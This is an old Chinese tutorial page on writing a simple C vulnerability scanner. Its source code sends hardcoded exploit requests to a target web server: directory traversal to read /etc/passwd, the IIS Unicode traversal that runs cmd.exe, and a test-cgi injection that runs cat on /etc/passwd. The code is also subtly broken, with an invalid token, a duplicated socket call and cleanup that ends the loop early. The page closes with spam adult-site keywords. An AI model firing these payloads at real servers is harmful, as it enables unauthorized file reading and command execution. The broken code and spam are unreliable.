• <ruby id="5koa6"></ruby>
    <ruby id="5koa6"><option id="5koa6"><thead id="5koa6"></thead></option></ruby>

    <progress id="5koa6"></progress>

  • <strong id="5koa6"></strong>
  • 編寫漏洞掃描器

    發表于:2007-07-14來源:作者:點擊數: 標簽:
    一、漏洞掃描器基本原理: 編寫漏洞掃描器探查遠程 服務器 上可能存在的具有 安全 隱患的文件是否存在,它的socket建立過程和上面的端口掃描器是相同的,所不同的是漏洞掃描器通常使用80端口,然后對這個端口發送一個GET文件的請求,服務器接收到請求會返回
    一、漏洞掃描器基本原理:  

    編寫漏洞掃描器探查遠程服務器上可能存在的具有安全隱患的文件是否存在,它的socket建立過程和上面的端口掃描器是相同的,所不同的是漏洞掃描器通常使用80端口,然后對這個端口發送一個GET文件的請求,服務器接收到請求會返回文件內容,如果文件不存在則返回一個錯誤提示,通過接收返回內容可以判斷文件是否存在。發送和接收數據需要使用函數send()和recv(),另外對流中存在的字符串進行判斷需要使用函數strstr(),這除了需要具備socket函數庫的知識以外,還需要一些有關string函數庫的知識。  

    二、簡單的漏洞掃描源代碼:  

    /********************************************/  
    /* 端口掃描器 源代碼 */  
    /* CgiScanner.cpp */  
    /********************************************/  

    #include <stdio.h>  
    #include <string.h>  
    #include <winsock.h>  

    int main(int argc,char *argv[])  
    {  
    if(argc!=2){  
    printf("Useage : scan [IP address]\n");  
    return(1);  
    }  

    struct sockaddr_in blah;  
    struct hostent *he;  
    WSADATA wsaData;  
    int i;  
    WORD wVersionRequested;  
    SOCKET sock;  

    char buff[1024];  
    char *ex[10];  
    ex[1]="GET /../../../../etc/passwd HTTP/1.0\n\n";  
    ex[2]="GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0\n\n";  
    ex[3]="GET /A.ida/%c1%00.ida HTTP/1.0\n\n";  
    ex[4]="GET /cgi-bin/pfdispaly.cgi?/../../../../etc/motd HTTP/1.0\n\n";  
    ex[5]="GET /cgi-bin/test-cgi?\help&0a/bin/cat%20/etc/passwd HTTP/1.0\n\n";  
    ex[6]="GET /cgi-bin/test-cgi?* HTTP/1.0\n\n";  
    char *fmsg="HTTP/1.1 200 OK";  

    wVersionRequested = MAKEWORD( 1, 1 );  
    if (WSAStartup(wVersionRequested , &wsaData)){  
    printf("Winsock Initialization failed.\n");  
    exit(1);  
    }  

    if ((sock=socket(AF_INET,SOCK_STREAM,0))==INVALID_SOCKET){  
    printf("Can not create socket.\n");  
    exit(1);  
    }  
    sock = socket(AF_INET,SOCK_STREAM,0);  
    blah.sin_family = AF_INET;  
    blah.sin_port = htons(80);  
    blah.sin_addr.s_addr= .net_addr(argv[1]);  

    if ((he=gethostbyname(argv[1]))!=NULL){  
    memcpy((char *)&blah.sin_addr.s_addr,he->h_addr,he->h_length);  
    }  
    else{  
    if((blah.sin_addr.s_addr=inet_addr(argv[1]))==-1){  
    WSACleanup();  
    exit(1);  
    }  
    }  

    for (i=1 ; i<7; i++) {
    if (connect(sock,(struct sockaddr*)&blah,sizeof(blah))==0){
    send(sock,ex[i],strlen(ex[i]),0);
    recv(sock,buff,sizeof(buff),0);
    if(strstr(buff,fmsg)!=NULL){
    printf("\nFound :%s\n", ex[i]);
    }
    }

    closesocket(sock);
    WSACleanup();
    return(1);
    }
    }

    這段代碼可以檢測六個漏洞,讀者可以根據自己的需要增加漏洞掃描的數量。程序實現的很簡潔,概括起來這段程序完成了一下四項工作:

    1、連接目標主機SERVER;
    2、向目標主機發送GET請求;
    3、接收目標返回數據;
    4、根據返回數據判斷文件是否存在。

    原文轉自:http://www.kjueaiud.com

    老湿亚洲永久精品ww47香蕉图片_日韩欧美中文字幕北美法律_国产AV永久无码天堂影院_久久婷婷综合色丁香五月

  • <ruby id="5koa6"></ruby>
    <ruby id="5koa6"><option id="5koa6"><thead id="5koa6"></thead></option></ruby>

    <progress id="5koa6"></progress>

  • <strong id="5koa6"></strong>